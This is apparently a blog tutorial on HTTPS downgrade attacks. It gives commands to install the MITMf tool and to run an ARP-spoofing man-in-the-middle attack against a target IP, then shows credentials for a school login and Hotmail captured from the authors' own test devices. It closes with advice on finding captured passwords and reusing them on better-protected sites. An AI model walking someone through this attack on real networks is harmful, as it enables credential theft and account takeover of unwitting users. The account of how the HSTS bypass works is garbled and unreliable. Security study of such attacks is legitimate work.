Post Connection Attacks: Protocol Downgrade Attack

In the previous chapters we managed to sniff login credentials from sites that use HTTP, but since many sites now have TLS/SSL protection added, we need to use additional tools.

One of these tools is called SSLStrip which was made by Moxie Marlinspike. SSLstrip will transparently hijack HTTP traffic and watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similiar HTTPS links.

To solve problem with SSLStrip, there was a new technology added to most browsers called HSTS headers which helps to protect websites against protocol downgrade attacks making SSLStrip useless. Couple of years later a guy called LeonardoNve (author of SSLStrip 2) found a vulnerability in HSTS that adding a little extra detail to the request, (like a fourth “w” after the world wide web) made the router’s DNS confused and it did now know how to react to it. After that the attacker can now redirect the request to his own DNS alternative proxy that will respond with a HTTP version of the page. This attack allows us bypass HSTS most of the times.

There are many different tools available for protocol downgrade attacks. Couple of examples are Ettercap, Bettercap, MITMproxy, SSLStrip2 + dns2proxy and MITMf. Out of these 5, We would recommend using Bettercap since it is being updated to this day but since. In this guide we will be using MITMf however since we found about Bettercap later.

To install MITMf first download all the needed packages from apt-get:

apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-que

Then proceed to install virtualenvwrapper:

pip install virtualenvwrapper

Since the location where you can find virtualenvwrapper might vary depending on your Linux distro type:

find / -name virtualenvwrapper.sh

Type the code below with your own path:

source /usr/local/bin/virtualenvwrapper.sh

Create your virtualenv:

mkvirtualenv MITMf -p /usr/bin/python2.7

Clone the MITMf repository

git clone https://github.com/byt3bl33d3r/MITMf

Cd into the directory, initialize and clone the repos submodules:

cd MITMf && git submodule init && git submodule update --recursive

Install the dependecies:

pip install -r requirements.txt

And finally open the MITMf

python mitmf.py --help

mitmf-lobby.png

If you want to you can start with checking your victim’s ARP table to see if it MITMf manages to spoof ARP.

Proceed to start MITMf with command:

mitmf --arp --spoof --gateway 192.168.0.1 --target 192.168.0.103 -i wlan1

Leave MITMf running and head over to the client you are targeting and try logging into different websites running HTTPS. We tried various sites using both PC running Windows 10 and OnePlus 5T running Android 8.1. Both PC and Phone were using Google Chrome as the browser.

 

pc testimoodle login
Accessing our school’s student infra with PC
MITMf pw 2
Credentials in MITMf

 

phone hotmail login
Accessing Microsoft’s Hotmail.com with Android phone
mitmf-password.png
Credentials in MITMf

 

If MITMf floods the terminal with text and you are not able to find the login credentials, just copy paste the wall of text and open it in a text editor like Leafpad, press ctrl + f and search for login.

If MITMf do not find the login information it is a good idea to run Wireshark in the background for extra layer of capturing packets.

We have now managed to capture login credentials even though the website is running TLS/SSL protection. Keep in mind these attacks still might not work on major websites like Facebook or Google, but in a scenario where attacker is monitoring victim’s accessed websites with Wireshark, he is able to find a vulnearable website that the victim is browsing. If the victim decides to log in to that said site, using these previously shown tricks the attacker is able to find the login credentials and since many people are using the same email + password combination in many different websites the attacker might now be able to access better protected websites like Facebook or Google just by logging in with the credentials he found out on a lesser protected website.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s